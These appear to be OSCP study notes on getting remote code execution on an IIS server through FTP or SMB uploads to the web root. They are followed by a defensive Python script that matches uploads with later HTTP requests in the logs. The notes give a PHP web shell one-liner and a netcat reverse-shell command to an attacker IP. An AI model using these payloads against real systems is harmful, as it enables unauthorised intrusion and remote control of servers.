OSCP Notes

Uploading a file to IIS

If you have FTP upload access, try uploading different types of files.
  • ASP, ASPX
git clone it and grep for the extension (grep asp$),
then rename the file to whatever.asp
  • If it gives a 500 error, try different webshells -> nishang ps1 -> reverse shell.
IIS server is open and you have SMB share access to the web root.
Try to create a web shell and upload it > access it!
<?php system($_REQUEST['ippsec']) ?>
RCE confirmed?
Uploading nc.exe (google nc64.exe) tends to get a stable shell on Windows!
nc.exe attacker_IP 9001 -e powershell
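
From the defending side, the pattern in these notes (a script file written into the web root over FTP, then requested over HTTP) shows up when the IIS FTP and HTTP logs are correlated. The Python below is an added example, not part of the original notes; it assumes the FTP site root maps to the web root, and the log lines and function names are constructed for illustration.

```python
from datetime import datetime, timedelta

SCRIPT_EXT = (".asp", ".aspx", ".php")  # script types the notes try to upload

# Constructed sample logs in W3C extended format (a subset of the IIS fields).
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-05-01 10:00:01 203.0.113.7 anonymous STOR /notes.txt 226
2024-05-01 10:00:09 203.0.113.7 anonymous STOR /whatever.asp 226
2024-05-01 10:00:30 203.0.113.7 anonymous STOR /blocked.aspx 550
"""
HTTP_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-05-01 10:00:20 GET /whatever.asp - 203.0.113.7 500
2024-05-01 10:01:02 GET /Whatever.ASP - 203.0.113.7 200
2024-05-01 10:02:00 GET /index.html - 198.51.100.4 200
"""

def parse_w3c(text):
    """Yield one dict per record, taking column names from the #Fields: directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            yield row

def find_upload_then_request(ftp_text, http_text, window=timedelta(hours=24)):
    """Flag HTTP requests for a script file that was stored over FTP shortly before."""
    uploads = {}
    for r in parse_w3c(ftp_text):
        path = r["cs-uri-stem"].lower()  # IIS paths are case-insensitive
        # 226 = transfer completed; rejected uploads (e.g. 550) are ignored
        if r["cs-method"].upper() == "STOR" and r["sc-status"] == "226" and path.endswith(SCRIPT_EXT):
            uploads.setdefault(path, r)  # keep the earliest upload of each path
    hits = []
    for r in parse_w3c(http_text):
        up = uploads.get(r["cs-uri-stem"].lower())
        if up and timedelta(0) <= r["ts"] - up["ts"] <= window:
            hits.append({"path": up["cs-uri-stem"], "uploaded_by": up["c-ip"],
                         "requested_by": r["c-ip"], "status": r["sc-status"],
                         "delay_s": int((r["ts"] - up["ts"]).total_seconds())})
    return hits

if __name__ == "__main__":
    for hit in find_upload_then_request(FTP_LOG, HTTP_LOG):
        print(hit)
```

A 500 followed by a 200 on the same freshly uploaded path matches the retry behaviour described in the notes, so the status sequence is worth alerting on as well as the first hit.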